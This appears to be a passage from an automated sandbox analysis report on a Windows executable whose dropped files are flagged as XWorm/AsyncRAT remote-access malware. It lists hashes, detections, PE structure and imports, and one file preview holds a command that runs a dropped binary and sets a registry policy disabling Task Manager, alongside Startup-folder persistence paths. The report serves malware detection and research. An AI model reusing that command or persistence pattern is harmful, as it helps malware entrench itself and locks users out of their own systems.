SSDEEP:	3:BtV+EM0XRAGKkljrAEFDFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:BIMekFiTStuH1jhRiI36BY
MD5:	2D7EF4649D4D1191B1201674616CC588
SHA1:	88FB16975F9D9EF0512BC35F82B674215D856C24
SHA-256:	EA01569970E47289F27369C7019C9CD988D471BCC8B65337EC295806C419302D
SHA-512:	B8CB8B6860A9FC892BC8398612C48B2C8C8E63EE10928A31E466A94255D7BBD0F22F2750621CD13364517C0A78FD887A09F005CAFC7CFAC5D72FB7D4A51B5489
Malicious:	false
Preview:	"%AppData%\Hypercontainercomponentnetcommon\ServerWeb.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\66fc9ff0ee96c2

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (427), with no line terminators
Category:	dropped
Size (bytes):	427
Entropy (8bit):	5.832519112443163
Encrypted:	false
SSDEEP:	12:nOEQDiVsjsLkL84gqyqjIm9KUL1AgR8WEfGLa33Lc8WK:nOrDiVAs+84dIK7APWEl7NR
MD5:	CA3CC9DC4EC03B2390871DC7231B8C2D
SHA1:	6431C5866B9C057C846F1800540167FAC57D33A5
SHA-256:	FE3EDD9041C909B73145E2E525025A467C0D449F27F39E4F006020767953DA2D
SHA-512:	04892CD7A9FD80F47FFDED89351D8C034724A408252D7A8C25910B4A5D725E6D832394F03C555D72D5479F3C278483CD3D232AA4A9BCAB5D788B81DA9021AFB8
Malicious:	false
Preview:	GoDRzXrpSSG0sqpy1DAZtkLhJw9dTkPLXTIC1cHthAh71xSdZ7CrztqfdfHCYNWsC4cZhn7Y6Q1tCNqVdgEVhiVonniVVEVUoz57V36wAovj27dQyvj2JAKdiyv4ElC15hEMRsAjkSU3xwvpJShkfdKnpbZgICrZl4nV2Q8Fu9S1pRqvDGuvEcVcWbhzTebik5R2IZx3UbzgKT7XvndCR6VIiL9bsIwQhuRu9xmnT0bnmyRDdJEqAZQnkIU7aVLLoj9aBNY7Bzsbfsgu458iDGPHdnK0dpM7pP8Cz0BQuHoLqyI2mjDeXmIiU16YCidWmvwPtd4D4sx6bEapeSN3lskCGZs73mNMnSi5C2IJp9kpyLHPaR3uUju4LtITu7JRelSIgfmlJEOmI5O5Sdgmtc1DinuStyYszSKN39t5oRk

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jun 11 17:07:08 2024, mtime=Tue Jun 11 17:07:08 2024, atime=Tue Jun 11 17:07:08 2024, length=34816, window=hide
Category:	dropped
Size (bytes):	764
Entropy (8bit):	5.074344665573905
Encrypted:	false
SSDEEP:	12:8e124dO0WCiTu8dY//YFLbHK9jAsVDrHkJ/BmV:8eps/JTd+whbHK5AsVDYJ/Bm
MD5:	D847E720A8D91E58A3FC05B3895FD26E
SHA1:	79C7EA507EF330B14CE06EDFCEED4F089FCAD4C4
SHA-256:	403728DE6CF119200CEE71915516309CD0E6F0B34F65DF70CF01CAF4CAE45AF8
SHA-512:	B518C65F3018271BEACE1F81E4D74A88202BB5176CFC3DD6186B5C7278114BB63F0A41E52ECDB352A93C31494191BEF59BDA26AF475FAE8FC9E56014AD39A52D
Malicious:	false
Preview:	L..................F.... ......,......,......,...........................v.:..DG..Yr?.D..U..k0.&...&......vk.v......#......,*.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X...Roaming.@......CW.^.X............................0.R.o.a.m.i.n.g.....b.2......X. .XClient.exe.H.......X..X.....a.....................W...X.C.l.i.e.n.t...e.x.e.......Y...............-.......X.............".....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......910646...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.5792271146909735
Encrypted:	false
SSDEEP:	384:OLxpXSqGWjxaAiQcamYpnnGnRLGVYCwvHixdTD2VR8pkFTBLTIZwYGDcvw9Ikuia:6XNcaZodYYC4CaV9FZ9jcOjhB/45
MD5:	1BE2B217087429A8397F448C9C7B8F8D
SHA1:	4507E83E00CC18D738452D9217F4DFA19CA9D2DE
SHA-256:	D4482CA83D2A2DBD011C63739477E90893728AF1A0B4E5FBC6413009573F7702
SHA-512:	8588A0EFAF8D857D773E5947D2EE7599559C1BDB139B5E28030E02ACA6B93C0291BA80616BA06B3A96E50059D829B233CBF854EF807AA313CF8E7890613B8922
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[af.................~............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....}... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B.......................H........Q...J............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ELAMBKUP\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (563), with no line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.879761936610048
Encrypted:	false
SSDEEP:	12:X4fkF8Tl/SXjOHm9knJSOk8vWGefvpTBHAl7iyNVUcBu10U:XpzTlIJSL+Wttg990kS
MD5:	1DFF6D48FC17B3FEBFE7DA7C08751F3C
SHA1:	7E60CAE161972837284D562A79CAF0D88FDF8A94
SHA-256:	063943635866CD94DE6B52EF3A53758AC7F2EDDCF9BF0237E98D517EFDC7412D
SHA-512:	B2778079E84F7205EC457A23D2AB852903AA2799E289955525C9ED26171FC97FBC5FB816C2D6C5A9B20FC15B711BACAAFDF3C4693406CB7931A479431C728BE0
Malicious:	false
Preview:	gffLo1bYZtuMOku1ahMNL3cNb0MyDST3M8tVRVKIMSHIoWrT4URQDBWmCSuxpnVHZ19Q1YjEXDA3vUiFI24tACzLlGS9lWdj7AtxWbbfuN39Ad1stoowslGWBypuGkcAjb6ukvtraY8xJzLIPjP6sr0V4WviwrZJu2ajhGI856WTmSMLngfgVfS2kk0N9K5t9zCRZllJbRBvVgsmKj5PL3yPki96P48uBmUxP5wB5VEEeghD1ODaPphFBxr1mo3hSQusL5WPx3TzytvEA5EB1ifVEPwcO4ZRbhvNvy162ymVVrQRBn0qk2quvYn6J3A2eCYR8hSMDHJC5J9W8ealEsri1AcXK5x8xu1TT9SeUomctnzlYR8odZywVzZ8E4BIUKPLRqC8L6QaFOzOL0936JfX5E8ejUZaneIjXnTrO9cgJYrG9LxO5HMLp2PMsiY1hzxlGQ1hhRp7q8OhX1eYhLffS73fXG9pkl8TkGAtUPqobPeqnrz1DATWURSIWVJaR9WE946R0uDRe0DDcN1qRImkSm8Tx1X8FQWc2aqtuhAS6B2dOPq

C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\IME\IMEKR\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.625
Encrypted:	false
SSDEEP:	3:cuW5ccK:zW5ccK
MD5:	1253F7F8F664DA4B2B6D2F91FCB4834C
SHA1:	762B2F4687D2DAA98458B8658BEF42BDA529D11F
SHA-256:	B27102F844B398ECB8F7935F85DC9A3B93FD4959121C36D3DE6CB3075DC594C4
SHA-512:	2E3315757F47C326D75126F2584F20F8A9E2B8088E52DDF92819372885649CA0BB33D14B72AE3744E0EEDE5B228F6227296C02F80B10D7B9333C4C6094001574
Malicious:	false
Preview:	xGdP9IIbgP1why9o

C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3549696
Entropy (8bit):	7.781810498852624
Encrypted:	false
SSDEEP:	49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
MD5:	7EC6BC11E4B2E409845E3160EC47F5D7
SHA1:	C1A1A62F844556FD150C7515E124E98BF6D79A02
SHA-256:	B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
SHA-512:	6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\IdentityCRL\d908c538d2e8d0

Download File

Process:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
File Type:	ASCII text, with very long lines (982), with no line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	5.906822978826983
Encrypted:	false
SSDEEP:	24:K7BuBiAA6B10Hj3sFASelzPbPgLqgnsnncmOibuhfHgC:FBiAA6P0HYGD7kL2cmOrfz
MD5:	5589D253A5789672D7B7388594743E65
SHA1:	CB35331D99E0DDFFF60749E33918298FDDD82661
SHA-256:	05DD576A382FC91CE3300CCB8E60C5EB61EE99FFAA7F6383648CCFD9107B0928
SHA-512:	C3CF2316BD7C5B78E38EEE78FC6B6821A3228C9ACB2F4C629C04C5FBA5A008C6B6850EC0A27681E1A9A41D550B13D1D86CC32CE18CDA38447FA4031CB9EC73B7
Malicious:	false
Preview:	xIVsm58y9tHsyIq7hYaLNPfAG5NKMqWwLyAeRHwHfc7cQZjGQOkbmIuhnVmrsylSXUhAHMpZmTpvSDtqVG37G4JCDc15fEZr1oF61j9EiKzTd9Pjm5Vl5nMcKe6oUu4h383o8xzwHyY5F0jDNRSktywOcmvXmVtyQRaeGllzGjdGOQWU52aDbUyFMpLVBbJwFkoyZE7mpddJUq9LPabt4qW6dVSbZPxoarAoli405yX80pugpAFkAZ1ZNsVEvfMZpzsnpVjrgkyFSYGxkwvZKMoBzla3N0FZl8TB6G1TaYEZlwHzmhd9uxPcKryD5qdqfYeUFF1d5b8vIPaDelRqWFpys00OSxYt4Y3MRxtgp9ESzeU5RujTZxTasqlOOnLHCO0tWNvr1uBWBX9Og47iOFUHFdelLeSCy6PknljE91bow7YVrXsTpn373to2sJgWc8hFHYl4V3iWnpVHEJ4xw8WLCRq37qVzVEMxZTNSwx8wEhUOYgyjPskdmWCzsr7ohtAichsu5mB89jHf7cfb1vknetKDQXkF0TOVgvv0xDomqmdCOh1QLgwwIXEtXpehC6HqUw8MqpnyG761PHysfT3TgcMJrBdIjGkuexscipjg38pLaMeP0vBsCxJ2kzeoLeOAWMXbZVK0uXahwAsfhORxE2rqoz2tL4UYtpyNzCzflL8pXlGjH9H7Ma5efqxkcapzCBxHLfqeYwM33CTCtSlLxXLSuUsIPOCKgImVx8XlTniaOBkdXv0JzdCpzeW1whPKtBXuZ7Ou5A2JyvEstPudY2VCG6fTmgzvXYqMozDZhGOyl21EaoIhwvv1qUocb5IYKHwZE1E3LV6RngbNFb27YR8mmzgTLl7l70oeGb9jkOWbyeNJ3aWACKA3IJxOUurkXUTx27HobTXJ5gxImWavO7jxzuV6ouOzgvEeKZR5Tsjtw07mWpm8T6VZvg8HlKAqFimJbT7NFecgY0A8xt

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.958753575220955
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ywXeiXEvP2.exe
File size:	3'817'238 bytes
MD5:	a8a4603bc85e306e0fdd17655e4820e4
SHA1:	5aa5d092a699c319c4d000f61eb526445b11662d
SHA256:	4b7b7e697954f5882dd6d3e8ee6197bab6c445dbd3a5af1118caa0e1ad908a9a
SHA512:	2b3b66aaecedd0669caadd835a02b22856e03e713657aa3fc597a9431e29cc3ec570881d4fdea23218a329ab537f1c181fc9fa3e11282e123bababe2f5596474
SSDEEP:	49152:fEuq6liv5bT20EgaBojf0nMyPbCqbfgIpoXW85SAmCgVibEuYUZzMA/y8N7RDnwG:fFqpbSdgaqADhpoXB5lbkHoNM9ZFv8
TLSH:	D106230AF39515F9E567C77889424981E6B63C060760AADF13F6097A6F233A0DE3F361
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x1400266b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6640972B [Sun May 12 10:17:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	e8a30656287fe831c9782204ed10cd68

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FDF31423818h
dec eax
add esp, 28h
jmp 00007FDF314231AFh
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007FDF31422773h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007FDF31423343h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007FDF31425003h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FDF31422243h
dec eax
lea edx, dword ptr [00023B67h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FDF31424412h
int3
jmp 00007FDF3142A1E0h
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4b1e0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4b214	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x71000	0xe3bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6c000	0x2ab4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x80000	0x938	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x460e0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x46180	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3de10	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4a4ac	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x398ce	0x39a00	43edabbddfa6948cff2e968fd336a07d	False	0.5457226138828634	data	6.465308419785883	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3b000	0x1118c	0x11200	53297ea4f69cf70feab0538ecef732e2	False	0.44722285583941607	data	5.215657068009717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4d000	0x1ef5c	0x1a00	08eb45cbc6a0e70bd1c0a96a66c4a6d0	False	0.2765925480769231	DOS executable (block device driver o\3050)	3.1766622656728773	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x6c000	0x2ab4	0x2c00	703496d6ceba70b1fe234ccc9c454141	False	0.4807350852272727	data	5.409685184469512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x6f000	0x308	0x400	c445681068e68e0f8df59c5ea517c5e5	False	0.2421875	data	2.786346435110699	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x70000	0x15c	0x200	b999e3f72a9a42ebb4d9b8fafa0a18e7	False	0.40625	data	3.3314534700182197	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x71000	0xe3bc	0xe400	02cfe737f5942f05968796f88e24ed4b	False	0.6334292763157895	data	6.77846206625868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x80000	0x938	0xa00	c057cd0b29d094da3cebf433be170d6d	False	0.498828125	data	5.228587706357198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
PNG	0x71674	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	1.0027729636048528
PNG	0x721bc	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	0.9363390441839495
RT_ICON	0x73768	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	0.47832369942196534
RT_ICON	0x73cd0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	0.5410649819494585
RT_ICON	0x74578	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	0.4933368869936034
RT_ICON	0x75420	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	0.5390070921985816
RT_ICON	0x75888	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.41393058161350843
RT_ICON	0x76930	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	0.3479253112033195
RT_ICON	0x78ed8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9809269502193401
RT_DIALOG	0x7cc4c	0x2ba	data	0.5286532951289399
RT_DIALOG	0x7cf08	0x13a	data	0.6560509554140127
RT_DIALOG	0x7d044	0xf2	data	0.71900826446281
RT_DIALOG	0x7d138	0x14a	data	0.6
RT_DIALOG	0x7d284	0x314	data	0.47588832487309646
RT_DIALOG	0x7d598	0x24a	data	0.6279863481228669
RT_STRING	0x7d7e4	0x1fc	data	0.421259842519685
RT_STRING	0x7d9e0	0x246	data	0.41924398625429554
RT_STRING	0x7dc28	0x1a6	data	0.514218009478673
RT_STRING	0x7ddd0	0xdc	data	0.65
RT_STRING	0x7deac	0x470	data	0.3873239436619718
RT_STRING	0x7e31c	0x164	data	0.5056179775280899
RT_STRING	0x7e480	0x110	data	0.5772058823529411
RT_STRING	0x7e590	0x158	data	0.4563953488372093
RT_STRING	0x7e6e8	0xe8	data	0.5948275862068966
RT_STRING	0x7e7d0	0x1c6	data	0.5242290748898678
RT_STRING	0x7e998	0x268	data	0.4837662337662338
RT_GROUP_ICON	0x7ec00	0x68	data	0.7019230769230769
RT_MANIFEST	0x7ec68	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

